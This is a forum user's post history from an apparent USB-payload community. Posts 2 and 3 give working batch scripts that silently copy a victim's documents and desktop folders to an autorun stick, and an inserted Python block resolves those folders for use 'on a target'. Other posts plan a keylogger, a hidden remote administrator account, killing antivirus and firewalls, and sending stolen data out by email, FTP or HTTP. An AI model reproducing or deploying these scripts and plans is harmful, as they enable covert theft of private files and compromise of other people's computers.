DMilton (Active Members, 132 posts)

Posts posted by DMilton

  1. :) Alright, I tried it on my friend's PC (Windows Vista) the other day. I got some pictures but not all of them, i.e. I didn't get any pic from the folder "My Pictures". AND I tried it again on my Windows XP and it didn't work. :F

    Is there any way to search for pics of a certain size? :) Thanks in advance again.

    I don't have a Windows Vista installation to test why it doesn't work with Vista; probably it is because the reg keys are not the same on Vista (can someone clarify this?). But on Windows XP it must be working...

    You can adapt the script as far as you want, but, for the moment, I don't have much time to do it for you. :(

  2. DMilton, sorry, but it didn't work on either the English or the Greek computer :( Thanks anyway!

    And Dingle, I don't know how to modify the exe file that you are talking about :( (Noobie)

    Fixed, it works. Try this.

    @echo off
    setlocal
    :: Temp files: the two registry exports and the four value lines filtered out of them
    set ActualUser=".\CurrVer.dat"
    set TmpVal=".\tmpval.dat"
    set Common=".\Common.dat"
    set /A ValCounter=1
    set var=
    if exist %ActualUser% del /F /Q %ActualUser%
    if exist %Common% del /F /Q %Common%
    if exist %TmpVal% del /F /Q %TmpVal%
    :: "Shell Folders" stores the expanded, localized path of each special folder,
    :: so no "My Documents"/"Desktop" name has to be hard-coded for any install language
    REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
    if not %errorlevel%==0 goto error
    REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
    if not %errorlevel%==0 goto error
    :: REG EXPORT writes UTF-16, so TYPE is used to convert it before FIND can match.
    :: :FOUND numbers the matches, so these four lines must stay in this order.
    type %ActualUser% | find "Personal" >> %TmpVal%
    type %ActualUser% | find "Desktop" >> %TmpVal%
    type %Common% | find "Common Documents">> %TmpVal%
    type %Common% | find "Common Desktop">> %TmpVal%
    :: Each line looks like "Personal"="C:\\Documents and Settings\\user\\My Documents";
    :: splitting on = leaves the quoted path in %%i
    FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO set var="%%i"
    if "%var%"=="" goto error
    FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO (
    call :FOUND %%i
    )
    del /F /Q %ActualUser%
    del /F /Q %Common%
    del /F /Q %TmpVal%
    goto :CONTINUE
    :FOUND
    :: %~1 drops the surrounding quotes; the .reg file doubles every backslash, undo that
    SET PP="%~1"
    SET PP=%PP:\\=\%
    SET PP=%PP:"=%
    SET RegKey=%PP%
    IF %ValCounter%==1 SET MyD=%RegKey%
    IF %ValCounter%==2 SET Dsk=%RegKey%
    IF %ValCounter%==3 SET ShDoc=%RegKey%
    IF %ValCounter%==4 SET ShDsk=%RegKey%
    set /A ValCounter=ValCounter+1
    :error
    GOTO :EOF
    :CONTINUE
    :: Here I added the actions you want to do
    :: %~d0 is the drive this batch runs from (the stick); one folder per machine
    mkdir "%~d0\%computername%\MyDocs"
    mkdir "%~d0\%computername%\Desktop"
    mkdir "%~d0\%computername%\SharedDocs"
    mkdir "%~d0\%computername%\SharedDesktop"
    xcopy "%MyD%" "%~d0\%computername%\MyDocs" /s/c/q/r/h
    xcopy "%Dsk%" "%~d0\%computername%\Desktop" /s/c/q/r/h
    :: Here I added similar slurping actions to do the same with Shared Documents and Shared Desktop (no worry what language you have)
    xcopy "%ShDoc%" "%~d0\%computername%\SharedDocs" /s/c/q/r/h
    xcopy "%ShDsk%" "%~d0\%computername%\SharedDesktop" /s/c/q/r/h
    exit

  3. Basically I tried to understand all that stuff but it seems quite strange to me. What I've done is pretty much traditional, simple and straightforward to me! So here is what I've done: I've put an autorun, an invis.vbs and 2 bat files.

    The first bat is

    wscript.exe "%~d0\invis.vbs" "drivers.bat"

    and the second:

    @echo off
    mkdir %~d0\%computername%
    xcopy "C:\Documents and Settings\%username%\My Documents" %~d0\%computername% /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\Desktop" %~d0\%computername% /s/c/q/r/h
    @cls
    @exit

    So what you sent to me will probably solve my problem, but the thing is that I don't know how and where to put the code. I am pretty much interested in getting .jpeg, Word files etc. and IE history, or just copying "My Documents" and "Desktop" (no problem since I got a 32 GB stick), so I don't think Switchblade is the one for me.

    Thanks for answering, hope these things don't sound too stupid to you :)

    The problem you have is the language: if you do it with a hard-coded path (Desktop is not the same folder name in Greek as in English), it will surely fail. With DingleBerries' method, you can easily modify the Python script to slurp the desired files from "My PC".

    I prepared a slurping batch to do exactly what you want; just replace the second batch you have with this one:

    @echo off
    set ActualUser=".\CurrVer.dat"
    set TmpVal=".\tmpval.dat"
    set Common=".\Common.dat"
    set /A ValCounter=1
    if exist %ActualUser% del /S /F /Q /A:- %ActualUser%
    if exist %Common% del /S /F /Q /A:- %Common%
    if exist %TmpVal% del /s /F /Q /A:- %TmpVal%
    REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
    REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
    if not %errorlevel%==0 goto error
    type %ActualUser% | find "Personal" >> %TmpVal%
    type %ActualUser% | find "Desktop" >> %TmpVal%
    type %Common% | find "Common Documents">> %TmpVal%
    type %Common% | find "Common Desktop">> %TmpVal%
    FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO set var="%%i"
    if "%var%"=="" goto error
    FOR /F "tokens=2* delims==" %%i IN (.\tmpval.dat) DO (
    call:FOUND %%i
    )
    del /S /F /Q /A:- %ActualUser%
    del /S /F /Q /A:- %Common%
    del /S /F /Q /A:- %TmpVal%
    goto :CONTINUE
    :FOUND
    SET PP="%~1"
    SET PP=%PP:\\=\%
    SET PP=%PP:"=%
    SET RegKey=%PP%
    IF %ValCounter%==1 SET MyD=%RegKey%
    IF %ValCounter%==2 SET Dsk=%RegKey%
    IF %ValCounter%==3 SET ShDoc=%RegKey%
    IF %ValCounter%==4 SET ShDsk=%RegKey%
    set /A ValCounter=ValCounter+1
    :error
    GOTO :EOF
    :CONTINUE
    :: Here I added the actions you want to do
    mkdir %~d0\%computername%
    xcopy "C:\Documents and Settings\%username%\%MyD%" %~d0\%computername% /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\%Dsk%" %~d0\%computername% /s/c/q/r/h
    :: Here I added similar slurping actions to do the same with Shared Documents and Shared Desktop (no worry what language you have)
    xcopy "C:\Documents and Settings\%username%\%ShDoc%" %~d0\%computername% /s/c/q/r/h
    xcopy "C:\Documents and Settings\%username%\%ShDsk%" %~d0\%computername% /s/c/q/r/h
    @cls
    @exit

    Tell us whether DingleBerries' method or mine worked.
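Added example, not code from this thread or from the Pocketknife/Switchblade payloads: the batches in posts 2 and 3 above find "My Documents" and "Desktop" by exporting the Shell Folders keys and grepping the .reg text with FIND, relying on the order of the matched lines and on `%PP:\\=\%` to undo the escaping. The Python below resolves the same four folders by actually parsing the REG EXPORT format (UTF-16 BOM, backslash-escaped strings, and the line-wrapped hex(2) encoding of REG_EXPAND_SZ values) and goes one step beyond the batch: it prefers the authoritative User Shell Folders entry, expanded with the target user's %USERPROFILE%, and only falls back to the Shell Folders cache the batch reads. The sample exports, the Greek folder names, the user name Yannis, the drive letter and helper names such as plan_copies are constructed for this example and are not taken from the thread or from a real machine.

```python
"""Parse REG EXPORT output to find the localized special folders that the
batch scripts above locate with FIND, and build the copy plan. Added example,
not code from the thread; the sample exports below are constructed, not real."""
import re

HKCU, HKLM = "HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE"
EXPLORER = r"Software\Microsoft\Windows\CurrentVersion\Explorer"
SHELL_FOLDERS = EXPLORER + r"\Shell Folders"            # REG_SZ cache, already expanded
USER_SHELL_FOLDERS = EXPLORER + r"\User Shell Folders"  # REG_EXPAND_SZ, authoritative
VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')

def decode_reg_export(raw: bytes) -> str:
    """REG EXPORT writes UTF-16 with a BOM, which is why the batch pipes TYPE into FIND."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    return raw.decode("cp1252", errors="replace")  # older REG.EXE builds wrote ANSI

def _logical_lines(text: str):
    """Undo the trailing-backslash wrapping REG EXPORT applies to long hex values."""
    pending = ""
    for line in text.splitlines():
        line = (pending + line.lstrip()) if pending else line
        if line.endswith("\\"):
            pending = line[:-1]
        else:
            pending = ""
            yield line.strip()
    if pending:
        yield pending.strip()

def _unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)  # .reg escapes backslash and quote with a backslash

def decode_value(data: str):
    """(type, value) for the right-hand side of a value line; only the types Shell Folders uses."""
    if data.startswith('"') and data.endswith('"'):
        return "REG_SZ", _unescape(data[1:-1])
    if data.startswith("hex(2):"):  # REG_EXPAND_SZ as comma-separated UTF-16LE bytes
        raw = bytes(int(h, 16) for h in data[7:].split(",") if h)
        return "REG_EXPAND_SZ", raw.decode("utf-16-le").rstrip("\x00")
    raise ValueError("unsupported value syntax: " + data)

def parse_reg(text: str) -> dict:
    """{key path: {value name: (type, value)}}; names keep the case the export used."""
    reg, current = {}, None
    for line in _logical_lines(text):
        if not line or line.startswith((";", "Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            reg.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m is None or current is None:
            raise ValueError("unexpected line: " + line)
        name = _unescape(m.group(1)) if m.group(1) is not None else ""  # "" is (Default)
        reg[current][name] = decode_value(m.group(2))
    return reg

def expand_env(value: str, env: dict) -> str:
    """%NAME% expansion like ExpandEnvironmentStrings: case-insensitive, unknown names kept."""
    upper = {k.upper(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: upper.get(m.group(1).upper(), m.group(0)), value)

def lookup(reg: dict, key: str, name: str):
    """Registry names are case-insensitive (the HKLM export spells it SOFTWARE)."""
    for k, values in reg.items():
        if k.lower() == key.lower():
            for n, tv in values.items():
                if n.lower() == name.lower():
                    return tv
    return None

def shell_folder(reg: dict, hive: str, name: str, env: dict):
    """Prefer User Shell Folders expanded with the target user's environment; fall
    back to the Shell Folders cache, which is the key the batch scripts read."""
    tv = lookup(reg, hive + "\\" + USER_SHELL_FOLDERS, name)
    if tv is not None:
        return expand_env(tv[1], env)
    tv = lookup(reg, hive + "\\" + SHELL_FOLDERS, name)
    return None if tv is None else tv[1]

# What the batch collects: (hive, value name, destination sub-folder on the stick)
TARGETS = ((HKCU, "Personal", "MyDocs"), (HKCU, "Desktop", "Desktop"),
           (HKLM, "Common Documents", "SharedDocs"), (HKLM, "Common Desktop", "SharedDesktop"))

def plan_copies(reg: dict, env: dict, drive: str, computername: str):
    """([(src, dst), ...], [names not found]); the copy itself is left to xcopy/shutil."""
    copies, missing = [], []
    for hive, name, sub in TARGETS:
        src = shell_folder(reg, hive, name, env)
        if src is None:
            missing.append(name)
        else:
            copies.append((src, f"{drive}\\{computername}\\{sub}"))
    return copies, missing

# Constructed sample (a Greek XP profile, where "My Documents" and "Desktop" are not
# the English names), laid out as REG EXPORT does, including the wrapped hex(2) value.
SAMPLE_HKCU = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData"="C:\\Documents and Settings\\Yannis\\Application Data"
"Desktop"="C:\\Documents and Settings\\Yannis\\Επιφάνεια εργασίας"
"Personal"="C:\\Documents and Settings\\Yannis\\Τα έγγραφά μου"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Personal"=hex(2):25,00,55,00,53,00,45,00,52,00,50,00,52,00,4f,00,46,00,49,00,4c,00,\
  45,00,25,00,5c,00,a4,03,b1,03,20,00,ad,03,b3,03,b3,03,c1,03,b1,03,c6,03,ac,03,\
  20,00,bc,03,bf,03,c5,03,00,00
"""
SAMPLE_HKLM = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop"="C:\\Documents and Settings\\All Users\\Επιφάνεια εργασίας"
"Common Documents"="C:\\Documents and Settings\\All Users\\Έγγραφα"
"""
SAMPLE_ENV = {"USERPROFILE": r"C:\Documents and Settings\Yannis"}  # target user's env

def demo():
    """Parse both constructed exports (as UTF-16 bytes, like the real files) and plan the copies."""
    reg = {}
    for text in (SAMPLE_HKCU, SAMPLE_HKLM):
        reg.update(parse_reg(decode_reg_export(b"\xff\xfe" + text.encode("utf-16-le"))))
    return plan_copies(reg, SAMPLE_ENV, "E:", "GREEK-PC")

if __name__ == "__main__":
    for src, dst in demo()[0]:
        print(src, "->", dst)
```

On a target you would export the two keys exactly as the batch does and feed the file bytes to decode_reg_export and parse_reg, then hand the (src, dst) pairs to xcopy or shutil.copytree. Keying on the value name instead of grepping the whole file also avoids a failure the FIND/FOR version has: a user name that itself contains "Desktop" or "Personal" produces an extra matching line and shifts the counter in :FOUND, so the wrong folder gets copied.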

  4. I'm going to look at that; I used the Pocketknife for a day but I like to do my own thing lol. It would be great to have an .ini or something that it reads for extensions; however, some systems won't let you run bats or vbs, so exes are just easier.

    I scripted it for the Pocketknife but it was never implemented because the project died. You can translate it to... anything!

    Look at it, it is very simple and the concept of how to do it is easy to understand. And if you don't want to have it as a batch, you can compile it too.

    It will work in 99% of cases; let me know which systems don't let you run bats or vbs (questionable) :lol:

    EDIT:

    Bad link, try THIS ONE

    BTW if you want a proof of concept, I'll release it.

  5. I think it's not necessary to have admin privileges to make a dd copy of RAM.

    For your purpose, you can use ManTech Memory DD to make a forensic image of physical memory, storing it as a raw binary file. Then, at home, you can use Volatility (perl framework) to analyze the image.

    You can call MDD (ManTech Memory DD) in an automated way from the USB with no problem (it doesn't need any library) and it will work for Windows 2000, Windows Server 2003, Windows XP, Windows Vista, and Windows Server 2008.

    The resulting image can grow to 4 GB...

  6. Why don't you try to implement THIS in your payload's code?

    It'll give you a way to slurp all the documents you want with a pre-configured plain text file listing the extensions you need. It's easy, ready to go and only needs a few copy-paste actions.

    That's the war! :lol:

    EDIT:

    Bad link, changed to a good one

  7. It's not difficult to program an app to do the following:

    a) Test the serial number of the inserted USB (so as not to have to test for a specific drive letter)

    b) If it matches a given list, run some code (for example, nothing)

    c) If it doesn't match the given list, run some other code, such as slurping the contents or creating a perfect copy of the hardware (dd copy), or spreading some code inside the USB, or infecting something, or pushing the nuclear red button!!!

    It's only an idea, but feasible. The only thing you have to do is program it :lol:

  8. A specific payload for a specific system? Hmmm...

    I think that with the right programming, it'll be feasible to have one payload for all systems; the thing is that you have to check many things before doing the work, such as OS version, installation language, proper checking of paths, checking for privileges, vulnerabilities, bypassing AV, etc.

    That's why I was writing a new payload, of course :lol:

  9. This is a free community; we can help others to have their weapons greased, but there are many people who don't want to read a forum to reach their own conclusions.

    Offering a service is as lucrative as getting the service ready to run without reading anything and without having any headache... Someone wants to be spoon-fed? OK, it'll surely have a price, won't it?

    For anyone else who wants to learn, there will always be an answer on how to.

  10. OK, Pocket-Knife still isn't dead.

    Some well-known people in the forums are developing new functionalities that can be added to the payload.

    I'm working in my little free time trying to fix bugs and add some other stuff to the Pocketknife payload. Some of the forum users are doing their part and we are collaborating in keeping the payload alive.

    I hope it will work all right with:

    - Correction of the "file not found" error given while checking for mounted devices that are not present.

    - Cleaning of the code, especially the use of variables.

    - Updating of all the programs used by the payload.

    - Extended detection of correct installation paths with a reliable path method.

    - Full functionality on machines with non-English installation languages.

    - Slurping of specific files and/or specific paths.

    - Slurping actions on all the user accounts of the PC.

    - Correct keylogger installation.

    - Results in HTML form.

    - Adding a hidden administrator account of the user's choice with remote privileges.

    - Looking for a way to make the payload run on Vista systems (not sure).

    - Free choice of how to retrieve the payload's results: email, FTP, HTTP+PHP+SQL

    - Killing AV tasks.

    - Addition of some of the stuff contained in Tcstool's U3 Incident Response Payload, thanks to Tcstool.

    - Addition of some of the stuff contained in DingleBerries' Tantō Payload, thanks to DingleBerries.

    - alexthedrifter is adding some useful new stuff to the payload, and working on a GUI for easy configuration of the payload options, thanks to alexthedrifter.

    - And more...

    Also I want to look for help/ideas on:

    - Translating the payload into other languages so the payload's results are in your own language (I'll do the work for Spanish).

    - Scripting code to do the stuff done by the AV-detected NirSoft programs.

    Just wait a bit; I don't have plenty of time but I'm working on it... And before releasing a version, I want it free of bugs.

  11. Yes, the problem is with any firewall software; then there's another problem, which is to disable the firewall software. You can do it with the Windows one, but you must kill the task with other firewall software... So, a double problem!

    One: Disable the antivirus...

    Two: Disable the firewall...

    With the batch method, you don't need to disable (or allow) anything but the antivirus software. Please correct me if it is not as I'm saying.

    I think a good solution is calling a batch from the AutoIt program, passing it the correct parameters in variables and doing the task with the batch.

    Another way could be using different methods (FTP, HTTP POST, email), selectable by the user in a pre-configuration (via the GUI) to send the logs, and calling different batches from the compiled exe with the chosen options. Then the payload would work for anyone using it. :huh:

  12. How about doing the PHP log transfer thing with AutoIt?

    When most programs are run, whether using PHP or SMTP, they always trigger a question from decent firewalls.

    DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?

    :blink: Of course! I didn't think about it, but I agree that any firewall will trigger on the program when it accesses the Internet... Then we'll see what you have been working on when you have it done.

  13. OK, OK, OK... I was looking at it just now...

    I know that having your compiled version of the payload is better for hiding your fingerprints, because you are compiling the mail account name and password into the same exe file, but what about doing it the MySQL+PHP way that was written up in this same forum? By the way, it ensures the bypass of any router because it does the stuff over port 80.

  14. Ill test and QA!

    I don't know if I have enough time to code :(

    All contributions will be good contributions ;)

    Why did laepo just ignore his thread? He could just tell us that he doesn't want to continue the development, instead of making people wonder where he's been for the past 2 months or so.

    If you know, let us know... I think he's very busy but we don't know the exact reason.

  15. I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3?

    Are the original hosts files copied and reinstalled after the ISO is updated?

    Edit: answered

    FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
    ..
    ..
    If FileExists( @SystemDir & "\drivers\etc\hosts.orig")  Then
    FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )

    WOW!
